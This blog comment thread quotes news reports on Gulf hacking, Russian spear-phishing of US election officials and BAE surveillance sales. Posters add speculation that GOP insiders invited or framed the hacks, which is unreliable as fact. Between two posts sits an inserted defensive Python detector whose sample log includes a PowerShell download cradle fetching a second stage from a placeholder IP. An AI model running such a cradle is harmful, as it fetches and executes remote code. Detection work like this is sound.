    President Trump arrived in the region on May 20, weeks after the barrage of criticism began, for an Arab summit in Saudi Arabia. “He told us exactly: ‘We have to work together in stopping the funding of extremist groups in the region and whenever I read reports about this region I read about Qatar and Saudi,’ ” the Qatari foreign minister, Sheikh Mohammed bin Abdulrahman Al Thani, recalled on Thursday.

    “Mr. President,” the foreign minister said he replied, “are the reports based on media reports or intelligence reports? If it is based on media reports, then this is something we cannot answer.”

    “We assured them that we have strong cooperation with our security agencies,” the foreign minister added.

    Then, three days after the Trump meeting in Riyadh, the Foundation for the Defense of Democracies held a conference in Washington dedicated to criticism of Qatar, titled “Qatar and the Muslim Brotherhood’s Global Affiliates.”

    Robert M. Gates, the former defense secretary and a friend of Mr. Otaiba, gave the keynote. Attendees included many of the authors of the critical op-ed articles and senior Obama administration officials. Organizers encouraged Mr. Otaiba to attend, and his staff sent Abu Dhabi, the Emirati capital, a detailed report.

    No representative of Qatar was invited. The hack of the Qatari news agency took place after midnight that night.

    Mr. Anderson, the cyber security researcher, said the low cost and relative ease of hiring hackers meant that more such attacks would surely follow.

    “This is the future for what countries all around the world can do,” he said, “if they have the money and the resources.”

    By Thursday night, Qatar’s Al Jazeera network reported that hackers were attempting to overload and crash its internet servers.

    ———–

    “Hacking in Qatar Highlights a Shift Toward Espionage-for-Hire” by DAVID D. KIRKPATRICK and SHEERA FRENKEL; The New York Times; 06/08/2017

    “In a report scheduled to be released on Friday, two independent cybersecurity researchers claim that at least one group of hackers can be found working as freelancers for a number of Gulf states, and that their methods bear a striking resemblance to the methods used to hack the Emirati ambassador.”

    And as these cybersecurity researchers note, not only are the methods in the Otaiba hack similar to those of a group of mercenary hackers they assert are working for a number of Gulf states, but this is also the sign of a broader transformation in the accessibility of hacking/disinformation capabilities that were once thought to be relatively exclusive.


    But the dirty tricks also heralded a broader transformation in international espionage. The dust-up in the Gulf is the clearest sign yet that cyberattacks coupled with disinformation campaigns are no longer the exclusive domain of sophisticated powers like Russia. Any country can get in the game for the relatively low price of a few freelance hackers.

    “They seem to be hackers-for-hire, freelancing for all sorts of different clients, and adapting their skills as needed,” said Collin Anderson, who is one of the researchers. Mr. Anderson and his partner, Claudio Guarnieri, have nicknamed the group Bahamut, after a monstrous fish floating in the Arabian Sea in the Jorge Luis Borges novel “Book of Imaginary Beings.”

    The group regularly uses spear phishing attacks — emails designed to look innocent but contain malicious software applications. While it is not yet clear if Bahamut was behind the hack of the ambassador’s email, the group targeted a number of Emirati diplomats as well as other public figures in the Gulf region.

    Other news organizations have reported receiving leaked Emirati emails from a group calling itself GlobalLeaks and using email addressing ending in .ru, suggesting the mercenary hackers may be Russians or wish to pose as Russian.

    “Other news organizations have reported receiving leaked Emirati emails from a group calling itself GlobalLeaks and using email addressing ending in .ru, suggesting the mercenary hackers may be Russians or wish to pose as Russian.”

    Yep, unless the hackers were Russian hackers who wanted to advertise for some reason that they’re Russian hackers, the use of a .ru email address by the group distributing these emails basically tells us nothing about who did it. And while these cybersecurity researchers are suspecting that the “Bahamut” group of mercenaries is behind the hack, if their methods involve spear-phishing emails it’s not like other skilled hackers familiar with the cybersecurity industry’s tracking of the Bahamut group couldn’t mimic their methods. That’s the fun of our new digital cold war.

    So at this point it sounds like we have no real idea who did the hack, but whoever did it appears to want to send a “Hi! I’m a Russian hacker!” signal to the world. Of course.

    Posted by Pterrafractyl | June 12, 2017, 8:30 pm
  2. @Pterrafractyl–

    In assessing this, one should not lose sight of the fact that the CIA’s hacking code enables the authorship of the deed to assume an Arabic language cover, as well as Russian, Chinese or Farsi.

    Or, as we might say “Farce-ey.”

    Don’t forget that the Shadow Brokers have seen to it that the entire global hacking community has the NSA’s hacking tools.

    Katy, bar the door!

    Best,

    Dave

    Posted by Dave Emory | June 12, 2017, 8:57 pm
  3. One of the curious aspects of Kim ‘Dotcom’ Schmitz’s claims about being in contact with Seth Rich is how long he waited to make his big claim that he was in contact with Rich all along. Because that claim didn’t come out until May 19th of this year, a few days after the big Fox News disinformation/hoax piece on Rich. Why didn’t Dotcom make these claims sooner? Like, in the middle of the 2016 campaign? Wouldn’t that have been the optimal time for such a stunt?

    But here’s what adds to the curious timing: Check out this tweet from Dotcom back on September 28, 2016, directed to Donald Trump:

    Hey @realDonaldTrump, I'm not 400 pounds and I have never hacked from inside my bed. However, you owe me — Kim Dotcom (@KimDotcom) September 28, 2016

    And don’t forget that this tweet came two days after the first Presidential Debate between Donald Trump and Hillary Clinton on September 26, 2017, during which Trump made his infamous “the hacker could have been a 400 pound guy sitting on his bed” comment. So Schmitz/’Dotcom’ was clearly responding to Trump’s comment about the hacking. And he’s clearly claiming attribution for something that helped Trump. And yet no claims from Dotcom at the time that Seth Rich was the DNC leaker. Despite how the timing would have been perfect for such a claim…especially if Dotcom has the evidence he claims he has. And yet all we get from Dotcom before his Seth Rich claims last month was a very mysterious tweet that appears to be telling Trump he “owes” Dotcom over the DNC hacks.

    Also keep in mind that if Dotcom, or someone closely associated with him, was the actual hacker, drawing attention to himself back when the election was still going on by making claims about his contacts with Seth Rich could have brought much closer scrutiny to Dotcom with potentially huge implications for the election if suspicions fell on Dotcom. Especially given Dotcom’s predictions back in May of 2015 that Julian Assange was going to be Hillary Clinton’s worst nightmare. So if Dotcom was concerned about getting implicated in the hack, waiting until after the election does kind of make sense.

    But for someone who clearly wanted Hillary to lose to Trump, waiting until now to make these claims instead of last fall really is rather curious. Especially given Dotcom’s September 28th mystery tweet. Unless, of course, making these claims earlier would have been potentially even more damaging to Trump. Which could have been the case if Dotcom was indeed the hacker.

    Posted by Pterrafractyl | June 13, 2017, 2:45 pm
  4. It sounds like the hacking of state election systems in the 2016 election was a lot more extensive than previously reported: Up to 39 states were hacked to one degree or another in a giant spear-phishing campaign according to a recent report in Bloomberg. And while there was no indication that the hackers were attempting to manipulate actual vote tallies, there were some signs that hackers tried, but failed, to manipulate the voter registry databases in Illinois, which could have the effect of changing vote totals by throwing some people off the voter rolls. And since Illinois was one of only a handful of states to give federal investigators full access to their systems it’s unclear how many other states had similar attempts.

    As of now, officials appear to be extremely worried that this mass hacking operation is going to happen in the 2018 or 2020 elections. And, of course, as of now, officials are characterizing the entire thing as an operation of Russian military intelligence, pointing to evidence like the IP address used. Yep, the GRU apparently doesn’t know how to use VPNs, proxies, or TOR and instead decided to use known GRU IP addresses to carry out this incredibly inflammatory hacking operation.

    The article also discusses how the extensive nature of the hacks so alarmed the Obama White House that a special ‘cyber Red Phone’ that was set up between Washington and Moscow to defuse potential cyber conflicts was used in October for the very first time. The Russian government denied responsibility, asked for more information, and said they would investigate it. All while the hacking continued.

    So either the Russian government was executing an unprecedented high-profile self-incriminating wave of incredibly inflammatory hacks and continued to do so even after the ‘cyber Red Phone’ got used for the first time with apparently no concern for the consequences, or someone (like the GOP) was hacking the US electoral systems and trying to frame the Russians. Either way, those state election systems could probably use an overhaul soon:

    Bloomberg Politics

    Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known

    by Michael Riley and Jordan Robertson

    June 13, 2017, 4:00 AM CDT

    * Attackers said to take measure of voting systems, databases
    * A ‘red phone’ warning to the Kremlin from Obama White House

    Russia’s cyberattack on the U.S. electoral system before Donald Trump’s election was far more widespread than has been publicly revealed, including incursions into voter databases and software systems in almost twice as many states as previously reported.

    In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database. Details of the wave of attacks, in the summer and fall of 2016, were provided by three people with direct knowledge of the U.S. investigation into the matter. In all, the Russian hackers hit systems in a total of 39 states, one of them said.

    The scope and sophistication so concerned Obama administration officials that they took an unprecedented step — complaining directly to Moscow over a modern-day “red phone.” In October, two of the people said, the White House contacted the Kremlin on the back channel to offer detailed documents of what it said was Russia’s role in election meddling and to warn that the attacks risked setting off a broader conflict.

    The new details, buttressed by a classified National Security Agency document recently disclosed by the Intercept, show the scope of alleged hacking that federal investigators are scrutinizing as they look into whether Trump campaign officials may have colluded in the efforts. But they also paint a worrisome picture for future elections: The newest portrayal of potentially deep vulnerabilities in the U.S.’s patchwork of voting technologies comes less than a week after former FBI Director James Comey warned Congress that Moscow isn’t done meddling.

    “They’re coming after America,” Comey told the Senate Intelligence Committee investigating Russian interference in the election. “They will be back.”

    A spokeswoman for the Federal Bureau of Investigation in Washington declined to comment on the agency’s probe.

    Kremlin Denials

    Russian officials have publicly denied any role in cyber attacks connected to the U.S. elections, including a massive “spear phishing” effort that compromised Hillary Clinton’s campaign and the Democratic National Committee, among hundreds of other groups. President Vladimir Putin said in recent comments to reporters that criminals inside the country could have been involved without having been sanctioned by the Russian government.

    One of the mysteries about the 2016 presidential election is why Russian intelligence, after gaining access to state and local systems, didn’t try to disrupt the vote. One possibility is that the American warning was effective. Another former senior U.S. official, who asked for anonymity to discuss the classified U.S. probe into pre-election hacking, said a more likely explanation is that several months of hacking failed to give the attackers the access they needed to master America’s disparate voting systems spread across more than 7,000 local jurisdictions.

    Such operations need not change votes to be effective. In fact, the Obama administration believed that the Russians were possibly preparing to delete voter registration information or slow vote tallying in order to undermine confidence in the election. That effort went far beyond the carefully timed release of private communications by individuals and parties.

    One former senior U.S. official expressed concern that the Russians now have three years to build on their knowledge of U.S. voting systems before the next presidential election, and there is every reason to believe they will use what they have learned in future attacks.

    Secure Channel

    As the first test of a communication system designed to de-escalate cyber conflict between the two countries, the cyber “red phone” — not a phone, in fact, but a secure messaging channel for sending urgent messages and documents — didn’t quite work as the White House had hoped. NBC News first reported that use of the red phone by the White House last December.

    The White House provided evidence gathered on Russia’s hacking efforts and reasons why the U.S. considered it dangerously aggressive. Russia responded by asking for more information and providing assurances that it would look into the matter even as the hacking continued, according to the two people familiar with the response.

    “Last year, as we detected intrusions into websites managed by election officials around the country, the administration worked relentlessly to protect our election infrastructure,” said Eric Schultz, a spokesman for former President Barack Obama. “Given that our election systems are so decentralized, that effort meant working with Democratic and Republican election administrators from all across the country to bolster their cyber defenses.”

    Illinois Database

    Illinois, which was among the states that gave the FBI and the Department of Homeland Security almost full access to investigate its systems, provides a window into the hackers’ successes and failures.

    In early July 2016, a contractor who works two or three days a week at the state board of elections detected unauthorized data leaving the network, according to Ken Menzel, general counsel for the Illinois board of elections. The hackers had gained access to the state’s voter database, which contained information such as names, dates of birth, genders, driver’s licenses and partial Social Security numbers on 15 million people, half of whom were active voters. As many as 90,000 records were ultimately compromised.

    But even if the entire database had been deleted, it might not have affected the election, according to Menzel. Counties upload records to the state, not the other way around, and no data moves from the database back to the counties, which run the elections. The hackers had no way of knowing that when they attacked the state database, Menzel said.

    The state does, however, process online voter registration applications that are sent to the counties for approval, Menzel said. When voters are added to the county rolls, that information is then sent back to the state and added to the central database. This process, which is common across states, does present an opportunity for attackers to manipulate records at their inception.

    Patient Zero

    Illinois became Patient Zero in the government’s probe, eventually leading investigators to a hacking pandemic that touched four out of every five U.S. states.

    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    (An NSA document reportedly leaked by Reality Winner, the 25-year-old government contract worker arrested last week, identifies the Florida contractor as VR Systems, which makes an electronic voter identification system used by poll workers.)

    In Illinois, investigators also found evidence that the hackers tried but failed to alter or delete some information in the database, an attempt that wasn’t previously reported. That suggested more than a mere spying mission and potentially a test run for a disruptive attack, according to the people familiar with the continuing U.S. counterintelligence inquiry.

    States’ Response

    That idea would obsess the Obama White House throughout the summer and fall of 2016, outweighing worries over the DNC hack and private Democratic campaign emails given to Wikileaks and other outlets, according to one of the people familiar with those conversations. The Homeland Security Department dispatched special teams to help states strengthen their cyber defenses, and some states hired private security companies to augment those efforts.

    In many states, the extent of the Russian infiltration remains unclear. The federal government had no direct authority over state election systems, and some states offered limited cooperation. When then-DHS Secretary Jeh Johnson said last August that the department wanted to declare the systems as national critical infrastructure — a designation that gives the federal government broader powers to intervene — Republicans balked. Only after the election did the two sides eventually reach a deal to make the designation.

    After the Obama administration transmitted its documents and Russia asked for more information, the hackers’ work continued. According to the leaked NSA document, hackers working for Russian military intelligence were trying to take over the computers of 122 local election officials just days before the Nov. 8 election.

    While some inside the Obama administration pressed at the time to make the full scope of the Russian activity public, the White House was ultimately unwilling to risk public confidence in the election’s integrity, people familiar with those discussions said.

    ———-

    “Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known” by Michael Riley and Jordan Robertson; Bloomberg Politics; 06/13/2017

    “In Illinois, investigators also found evidence that the hackers tried but failed to alter or delete some information in the database, an attempt that wasn’t previously reported. That suggested more than a mere spying mission and potentially a test run for a disruptive attack, according to the people familiar with the continuing U.S. counterintelligence inquiry.”

    So in Illinois, one of a handful of states that gave federal investigators the most complete access to their systems and apparently one of the first states hacked since the hack was first detected in July, investigators found evidence of at least attempts at manipulating voter roll data. That’s certainly a big deal and the kind of finding that potentially raises questions about the integrity of a lot more than just the votes for President. ALL races in a state could be impacted by manipulating the voter rolls.

    How about the rest of the states? That’s unclear. Thanks, in part, to the GOP’s blocking of an attempt by DHS to declare the nation’s voting systems as “national critical infrastructure” that would have given federal investigators great access to the other states’ voting systems:


    In many states, the extent of the Russian infiltration remains unclear. The federal government had no direct authority over state election systems, and some states offered limited cooperation. When then-DHS Secretary Jeh Johnson said last August that the department wanted to declare the systems as national critical infrastructure — a designation that gives the federal government broader powers to intervene — Republicans balked. Only after the election did the two sides eventually reach a deal to make the designation.

    And at this point federal investigators apparently can’t really say how many other states experienced similar attempts. Still, based on the digital “signatures” that investigators have identified (because the ‘Russian hackers’ apparently didn’t bother trying to obscure them), “traces” of the hackers were found in the systems of 39 states:


    Patient Zero

    Illinois became Patient Zero in the government’s probe, eventually leading investigators to a hacking pandemic that touched four out of every five U.S. states.

    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    (An NSA document reportedly leaked by Reality Winner, the 25-year-old government contract worker arrested last week, identifies the Florida contractor as VR Systems, which makes an electronic voter identification system used by poll workers.)

    And it sounds like a large number of those hacks (or hack attempts) took place in the last week of the campaign:


    After the Obama administration transmitted its documents and Russia asked for more information, the hackers’ work continued. According to the leaked NSA document, hackers working for Russian military intelligence were trying to take over the computers of 122 local election officials just days before the Nov. 8 election.

    So, overall, if we take this report at face value, the Russian government brazenly hacked into the Illinois state voting systems, tried to manipulate voter roll data, and then continued to brazenly hack – or attempt to hack – into at least 38 other states. All using digital “signatures”, like IP addresses, that were traced back to the GRU. And the really big wave of attacks happened in the last week of the campaign, after President Obama used the “cyber Red Phone” for the first time ever in October. And the Russian government ignored those calls to stop the hacking without any apparent fear of reprisal. And just kept hacking away without bothering to change those digital “signatures” from the July Illinois hack. Are we sure “Lazy Bear” isn’t a more appropriate moniker for this alleged GRU hacking group? “Fancy Bear” doesn’t quite capture their main attribute.

    Of course, since digital “signatures” are the kind of things hackers can often spoof and a declaration of cyber war would be an insane move by the Russian government, there’s the very obvious possibility that someone else made all these hacking attempts. So it’s worth noting that in The Intercept report about the leaked NSA document showing the analysis of the hacking of a Florida voting systems company they interview Jake Williams – a former member of NSA’s elite hacking Tailored Access Operations team – and ask him about the spear-phishing campaign used against those 122 officials in the last week of the campaign. According to Williams, that spear-phishing operation was of “medium sophistication” that “practically any hacker can pull off”:

    The Intercept

    Top-Secret NSA Report Details Russian Hacking Effort Days Before 2016 Election

    Matthew Cole, Richard Esposito, Sam Biddle, Ryan Grim

    June 5 2017, 2:44 p.m.

    Russian military intelligence executed a cyberattack on at least one U.S. voting software supplier and sent spear-phishing emails to more than 100 local election officials just days before last November’s presidential election, according to a highly classified intelligence report obtained by The Intercept.

    The top-secret National Security Agency document, which was provided anonymously to The Intercept and independently authenticated, analyzes intelligence very recently acquired by the agency about a months-long Russian intelligence cyber effort against elements of the U.S. election and voting infrastructure. The report, dated May 5, 2017, is the most detailed U.S. government account of Russian interference in the election that has yet come to light.

    While the document provides a rare window into the NSA’s understanding of the mechanics of Russian hacking, it does not show the underlying “raw” intelligence on which the analysis is based. A U.S. intelligence officer who declined to be identified cautioned against drawing too big a conclusion from the document because a single analysis is not necessarily definitive.

    The report indicates that Russian hacking may have penetrated further into U.S. voting systems than was previously understood. It states unequivocally in its summary statement that it was Russian military intelligence, specifically the Russian General Staff Main Intelligence Directorate, or GRU, that conducted the cyber attacks described in the document:

    Russian General Staff Main Intelligence Directorate actors … executed cyber espionage operations against a named U.S. company in August 2016, evidently to obtain information on elections-related software and hardware solutions. … The actors likely used data obtained from that operation to … launch a voter registration-themed spear-phishing campaign targeting U.S. local government organizations.

    This NSA summary judgment is sharply at odds with Russian President Vladimir Putin’s denial last week that Russia had interfered in foreign elections: “We never engaged in that on a state level, and have no intention of doing so.” Putin, who had previously issued blanket denials that any such Russian meddling occurred, for the first time floated the possibility that freelance Russian hackers with “patriotic leanings” may have been responsible. The NSA report, on the contrary, displays no doubt that the cyber assault was carried out by the GRU.

    The Spear-Phishing Attack

    As described by the classified NSA report, the Russian plan was simple: pose as an e-voting vendor and trick local government employees into opening Microsoft Word documents invisibly tainted with potent malware that could give hackers full control over the infected computers.

    But in order to dupe the local officials, the hackers needed access to an election software vendor’s internal systems to put together a convincing disguise. So on August 24, 2016, the Russian hackers sent spoofed emails purporting to be from Google to employees of an unnamed U.S. election software company, according to the NSA report. Although the document does not directly identify the company in question, it contains references to a product made by VR Systems, a Florida-based vendor of electronic voting services and equipment whose products are used in eight states.

    The spear-phishing email contained a link directing the employees to a malicious, faux-Google website that would request their login credentials and then hand them over to the hackers. The NSA identified seven “potential victims” at the company. While malicious emails targeting three of the potential victims were rejected by an email server, at least one of the employee accounts was likely compromised, the agency concluded. The NSA notes in its report that it is “unknown whether the aforementioned spear-phishing deployment successfully compromised all the intended victims, and what potential data from the victim could have been exfiltrated.”

    VR Systems declined to respond to a request for comment on the specific hacking operation outlined in the NSA document. Chief Operating Officer Ben Martin replied by email to The Intercept’s request for comment with the following statement:

    Phishing and spear-phishing are not uncommon in our industry. We regularly participate in cyber alliances with state officials and members of the law enforcement community in an effort to address these types of threats. We have policies and procedures in effect to protect our customers and our company.

    Although the NSA report indicates that VR Systems was targeted only with login-stealing trickery, rather than computer-controlling malware, this isn’t necessarily a reassuring sign. Jake Williams, founder of computer security firm Rendition Infosec and formerly of the NSA’s Tailored Access Operations hacking team, said stolen logins can be even more dangerous than an infected computer. “I’ll take credentials most days over malware,” he said, since an employee’s login information can be used to penetrate “corporate VPNs, email, or cloud services,” allowing access to internal corporate data. The risk is particularly heightened given how common it is to use the same password for multiple services. Phishing, as the name implies, doesn’t require everyone to take the bait in order to be a success — though Williams stressed that hackers “never want just one” set of stolen credentials.

    In any event, the hackers apparently got what they needed. Two months later, on October 27, they set up an “operational” Gmail account designed to appear as if it belonged to an employee at VR Systems, and used documents obtained from the previous operation to launch a second spear-phishing operation “targeting U.S. local government organizations.” These emails contained a Microsoft Word document that had been “trojanized” so that when it was opened it would send out a beacon to the “malicious infrastructure” set up by the hackers.

    The NSA assessed that this phase of the spear-phishing operation was likely launched on either October 31 or November 1 and sent spear-phishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document. These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files “very likely” would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report says could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocks and opens a target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.

    According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. “Once the user opens up that email [attachment],” Williams explained, “the attacker has all the same capabilities that the user does.” Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the “quantity of exfiltrated data is only limited by the controls put in place by network administrators.” Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.”

    The NSA, however, is uncertain about the results of the attack, according to the report. “It is unknown,” the NSA notes, “whether the aforementioned spear-phishing deployment successfully compromised the intended victims, and what potential data could have been accessed by the cyber actor.”

    ———-

    “Top-Secret NSA Report Details Russian Hacking Effort Days Before 2016 Election” by Matthew Cole, Richard Esposito, Sam Biddle, Ryan Grim; The Intercept; 06/05/2017

    “The NSA assessed that this phase of the spear-phishing operation was likely launched on either October 31 or November 1 and sent spear-phishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document…”

    A spear-phishing attack using documents from the Florida-based “VR Systems” as the bait. That’s what the alleged Russian hackers did in the last week of the campaign. And how sophisticated was this spear-phishing attack? Almost any hacker could have done it. That’s how sophisticated:


    According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. “Once the user opens up that email [attachment],” Williams explained, “the attacker has all the same capabilities that the user does.” Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the “quantity of exfiltrated data is only limited by the controls put in place by network administrators.” Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.”

    “Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.””

    So according to federal investigators, ‘the GRU’ used a spear-phishing technique that any hacker could have pulled off, and did it in a manner that left digital “signatures”, like IP addresses, that apparently led back to the GRU. And kept the same digital signatures in the July 2016 hack on the Illinois voting system that were found in the wave of spear-phishing attacks in the last week of the campaign. Even after getting a “cyber Red Phone” call from the White House for the first time ever in October, thus opening Russia to potential revenge attacks for years to come and poison-pilling the possible utility of having a Russian-friendly President Trump in the White House. It’s as if the cost-benefit analysis didn’t factor in the costs. That’s the story we’re supposed to accept.

    And, amazingly, based on the first report, it sounds like the bulk of the 39 hacked states got hacked by this spear-phishing campaign in the last week of the campaign despite the intense focus around potential hacking in the prior months. Those must have been some pretty compelling phishing emails. It raises the question as to whether or not some of those 122 targeted officials were trying to get their systems hacked. Keep in mind one of the very interesting things about a spear-phishing attack in a scenario like this one, where one of the hacked parties (the GOP) just might want to get hacked: spear-phishing is a great way for an insider to invite in a hacker while maintaining plausible deniability. Oops! I was tricked! ;)

    It’s pretty clear that US state voting systems have a number of serious vulnerabilities. Specifically, people who fall for phishing emails and whatever malware is now installed on those systems after those hacks. Also note one of the main things protecting these systems from a much bigger hack: the decentralized nature of US voting systems, in which different locales use different technologies. It’s a lot harder to pull off a big hack in a decentralized system. And let’s also not forget that one of the giant voting vulnerabilities today is a direct consequence of the US’s response to the 2000 election voting debacle in Florida. Following that, Congress gave states gobs of cash to replace their paper ballot systems with hackable electronic voting machines. And now we have a problem with hackable electronic voting machines. Still.

    So if there is a big push to overhaul and improve US voting systems in anticipation of the 2016 hackers returning in future elections, keep in mind that it’s a lot harder to hack paper ballots.

    Posted by Pterrafractyl | June 14, 2017, 10:21 pm
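The attack chain the Intercept excerpt above describes (a Word attachment whose embedded commands launch PowerShell to fetch a second stage) is one of the more detectable things an endpoint can do, because Word has little legitimate reason to start a shell. The following is an added example, not code from the article, the NSA report or any product: it scans constructed process-creation records for Office applications spawning PowerShell and scores the command line for download-cradle indicators; the log format, host names, paths and the 192.0.2.10 address are assumptions.

```python
"""Detect the Office-to-PowerShell launch chain described in the NSA report.

Added example, not code from the article, the NSA document or any vendor:
a weaponized Word attachment that runs PowerShell to download a second
stage appears on the endpoint as WINWORD.EXE spawning powershell.exe.
This scans constructed process-creation records for that parent/child
pair and scores the command line for download-cradle indicators.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed, pipe-delimited process-creation records (not real telemetry):
# time|host|parent_image|image|command_line
SAMPLE_LOG = """\
2016-11-01T09:12:03|clerk-pc-07|C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2016-11-01T09:12:04|clerk-pc-07|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\cmd.exe|cmd /c whoami
2016-11-01T09:15:10|clerk-pc-07|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-ChildItem
2016-11-01T09:20:45|admin-ws-02|C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2')
2016-11-01T09:21:00|admin-ws-02|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE|WINWORD.EXE /n EViD_Documentation.docx
"""

# Any Office application launching a shell is alerted; the score only ranks it.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
BASE_SCORE = 5  # weight of the parent/child relationship itself

# (weight, pattern) pairs for the command line; weights are this example's own.
INDICATORS: List[Tuple[int, re.Pattern]] = [
    (3, re.compile(r"(?<![\w-])-(?:encodedcommand|enc|en|ec|e)\b", re.I)),
    (2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    (1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    (2, re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I)),
    (3, re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    (2, re.compile(r"\biex\b|invoke-expression", re.I)),
    (1, re.compile(r"https?://", re.I)),
]


@dataclass
class Alert:
    time: str
    host: str
    parent: str          # lower-cased image name of the Office process
    command_line: str
    score: int
    hits: List[str] = field(default_factory=list)  # indicator text that matched


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command_line(cmd: str) -> Tuple[int, List[str]]:
    """Sum indicator weights found in a command line; return (score, matches)."""
    score, hits = 0, []
    for weight, pattern in INDICATORS:
        match = pattern.search(cmd)
        if match:
            score += weight
            hits.append(match.group(0))
    return score, hits


def parse_record(line: str) -> Optional[Dict[str, str]]:
    """Split one pipe-delimited record; return None for malformed lines."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    time, host, parent, image, cmd = parts
    return {"time": time, "host": host, "parent": parent, "image": image, "cmd": cmd}


def detect(log_text: str) -> List[Alert]:
    """Alert on every Office -> PowerShell launch, ranked by command-line score."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_record(line.strip())
        if rec is None:
            continue
        if basename(rec["parent"]) in OFFICE_APPS and basename(rec["image"]) in SHELLS:
            extra, hits = score_command_line(rec["cmd"])
            alerts.append(Alert(rec["time"], rec["host"], basename(rec["parent"]),
                                rec["cmd"], BASE_SCORE + extra, hits))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert.time} {alert.host}: {alert.parent} -> powershell "
              f"(score {alert.score}, indicators {alert.hits})")
```

Only the two records where an Office process is the parent are flagged; PowerShell started from explorer.exe and the ordinary document open are ignored, so the rule stays quiet on normal clerk activity.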
  5. Here’s an article that reminds us of something to keep in mind when assessing the curious case of the apparent hacking of Qatar’s news agency followed by the email hack of the UAE’s ambassador to the US that some suspect was done by a mercenary hacker group: Middle Eastern governments probably don’t need to hire rogue hacker mercenary groups to carry out very sophisticated hacks:

    BBC

    How BAE sold cyber-surveillance tools to Arab states

    15 June 2017

    A year-long investigation by BBC Arabic and a Danish newspaper has uncovered evidence that the UK defence giant BAE Systems has made large-scale sales across the Middle East of sophisticated surveillance technology, including to many repressive governments.

    These sales have also included decryption software which could be used against the UK and its allies.

    While the sales are legal, human rights campaigners and cyber-security experts have expressed serious concerns these powerful tools could be used to spy on millions of people and thwart any signs of dissent.

    The investigation began in the small Danish town of Norresundby, home to ETI, a company specialising in high-tech surveillance equipment.

    ETI developed a system called Evident, which enabled governments to conduct mass surveillance of their citizens’ communications.

    A former employee, speaking to the BBC anonymously, described how Evident worked.

    “You’d be able to intercept any internet traffic,” he said. “If you wanted to do a whole country, you could. You could pin-point people’s location based on cellular data. You could follow people around. They were quite far ahead with voice recognition. They were capable of decrypting stuff as well.”

    One early customer of the new system was the Tunisian government.

    The BBC tracked down a former Tunisian intelligence official who operated Evident for the country’s veteran leader, President Zine al-Abidine Ben Ali.

    “ETI installed it and engineers came for training sessions,” he explained. “[It] works with keywords. You put in an opponent’s name and you will see all the sites, blogs, social networks related to that user.”

    The source says President Ben Ali used the system to crack down on opponents until his overthrow in January 2011, in the first popular uprising of the Arab Spring.

    Campaigners ‘vanished’

